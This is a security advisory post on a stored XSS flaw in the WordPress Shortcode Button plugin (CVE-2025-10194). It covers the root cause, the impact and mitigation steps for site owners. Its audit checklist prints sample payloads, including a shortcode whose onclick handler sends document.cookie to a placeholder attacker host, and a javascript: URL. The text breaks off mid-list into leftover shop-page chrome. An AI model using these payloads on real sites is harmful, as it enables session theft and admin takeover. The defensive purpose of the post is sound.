Plugin Name	WordPress Shortcode Button plugin
Type of Vulnerability	Stored XSS
CVE Number	CVE-2025-10194
Urgency	Low
CVE Publish Date	2025-10-15
Source URL	CVE-2025-10194

Shortcode Button (≤ 1.1.9) — Authenticated Contributor Stored XSS (CVE-2025-10194): What WordPress Site Owners Must Do

Author: Hong Kong Security Expert | Date: 2025-10-15

Summary: An authenticated stored cross-site scripting (XSS) vulnerability affecting the Shortcode Button plugin (versions ≤ 1.1.9, tracked as CVE-2025-10194) allows a low-privileged user (Contributor) to inject JavaScript that is stored and executed when other users view content. This post explains the technical root cause, real-world impact, step-by-step mitigation for site owners, developer fixes, detection techniques, and practical virtual-patching guidance.

TL;DR

Vulnerability: Stored Cross-Site Scripting (XSS) in Shortcode Button ≤ 1.1.9.
CVE: CVE-2025-10194.
Required privilege: Contributor (authenticated user with ability to add or edit posts).
Risk: Arbitrary JavaScript execution in the context of site visitors or administrators depending on where the plugin renders content; can lead to session theft, content defacement, redirect to malware, or admin takeover.
Official fix: Not available at time of disclosure.
Immediate actions: Remove/disable plugin if you don’t need it; restrict contributor capabilities; audit and sanitize content; deploy virtual patching (WAF rule). Example rules and detection patterns are included below.
Long-term: Patch plugin when an official update is released or apply secure coding fixes in plugin code.

Why this matters (practical explanation)

Most WordPress site owners assume only high-privilege accounts can insert dangerous markup. Shortcodes change the equation: plugins parse shortcode attributes and render HTML in post content and sometimes in the admin UI. If a plugin fails to sanitize or escape shortcode attributes when saving or rendering, a Contributor can embed JavaScript that is stored in the database and executes later when anyone views that page — including Editors and Administrators. That is a stored XSS.

An attacker with a Contributor account can:

Insert a malicious shortcode into a post or page they control that stores JavaScript in the database.
Wait for an Editor or Administrator to view the post (for example, preview or edit), causing execution in their browser and enabling actions that require those users’ session/auth credentials.
Exfiltrate cookies, perform actions on behalf of the victim (CSRF via JavaScript), create additional admin accounts, or inject persistent backdoors.

Because the plugin renders the button, the vulnerability may trigger on both front-end and back-end displays, increasing the attack surface.

Technical root cause (high level)

Typical root cause pattern for stored XSS in shortcode plugins:

The plugin accepts user-controlled attributes (e.g., label, url, title, class).
It does not sanitize input when saving, or does not escape output when rendering.
The attribute is stored (in post_content, postmeta, or options) and later printed without proper escaping (esc_html, esc_attr, esc_url) or with insufficient filtering like strip_tags without whitelisting.
The plugin trusts contributor-provided content or relies on WordPress internals that do not sanitize shortcode attributes automatically.
When the stored data is rendered (front-end, editor preview, or admin list view), the injected JavaScript executes.

Classic examples include script tags or event handler attributes (onmouseover=, onclick=), javascript: URLs in href attributes, or HTML entities that are incorrectly decoded before rendering.

Which sites are affected?

Sites with the Shortcode Button plugin installed and active at version 1.1.9 or earlier.
Sites that allow users to register or that assign the Contributor role to untrusted people.
Sites where contributors can add or edit posts/pages or other content that might include shortcodes.

If you are unsure whether this plugin is installed, check your WordPress admin under Plugins → Installed Plugins, or search your filesystem for folders named like the plugin slug.

Immediate mitigation checklist (site owner / admin)

If you manage a WordPress site that uses Shortcode Button ≤ 1.1.9, follow this prioritized checklist immediately:

Put the site into maintenance mode for admin work (optional but recommended).
Deactivate the Shortcode Button plugin.
- If you rely on the plugin’s functionality and cannot immediately remove it, proceed to the WAF virtual patching steps below and restrict contributor actions until a fix is available.

Audit contributor-created content:

Search posts and pages for the plugin shortcode(s) and inspect attributes for suspicious payloads such as

Event handler in attributes:

[shortcode_button label="Click" url="#" onclick="document.location='https://attacker/?c='+document.cookie"]

javascript: URL in href:

[shortcode_button label="Go" url="javascript:"]

Encoded/obfuscated JavaScript:

Using entity encoding like 
			
				
			
					
							
			
			
			





		
		
					
				       
    
  
  
 
 
    
  Review My Order
 0 
    
 
    Suggested for you
    
   
 
 
   
 
     Subtotal
 Taxes & shipping calculated at checkout
 
   
 
     Checkout  
 
 
 
 
 
  
 
      
 0 
 














































Notifications

        
        
        


        
        

    
            
            English
            
                                    Chinese (Hong Kong)                                    Chinese (China)                                    Spanish                                    Hindi                                    French